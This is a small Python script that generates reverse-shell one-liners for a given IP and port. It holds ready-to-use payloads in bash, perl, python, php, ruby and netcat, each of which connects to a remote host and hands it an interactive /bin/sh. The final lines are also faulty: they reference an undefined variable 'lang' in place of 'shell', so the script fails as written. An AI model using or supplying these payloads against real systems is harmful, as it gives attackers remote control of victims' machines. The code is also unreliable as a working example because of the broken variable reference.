#!/usr/bin/python3 -u

"""
Usage: ./revs-creator 10.10.10.10 1234 bash 
"""

import sys

if len(sys.argv) != 4:
    print("Missing Arguments..")
    quit()

# Shell snippets
shell_snippets = {}
shell_snippets["bash"] = """bash -i >& /dev/tcp/__IP__/__PORT__ 0>&1"""
shell_snippets["perl"] = """perl -e 'use Socket;$i="__IP__";$p=__PORT__;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'"""
shell_snippets["python"] = """python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("__IP__",__PORT__));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'"""
shell_snippets["python3"] = """python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("__IP__",__PORT__));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'"""
shell_snippets["php"] = """php -r '$sock=fsockopen("__IP__",__PORT__);exec("/bin/sh -i <&3 >&3 2>&3");'"""
shell_snippets["ruby"] = """ruby -rsocket -e'f=TCPSocket.open("__IP__",__PORT__).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'"""
shell_snippets["netcat"] = """nc -e /bin/sh __IP__ __PORT__"""
shell_snippets["netcat_alt"] = """rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc __IP__ __PORT__ >/tmp/f"""

ip = sys.argv[1]
port = sys.argv[2]
shell = shell_snippets[sys.argv[3]]

shell = lang.replace("__PORT__", port)
shell = lang.replace("__IP__", ip)
print(lang)
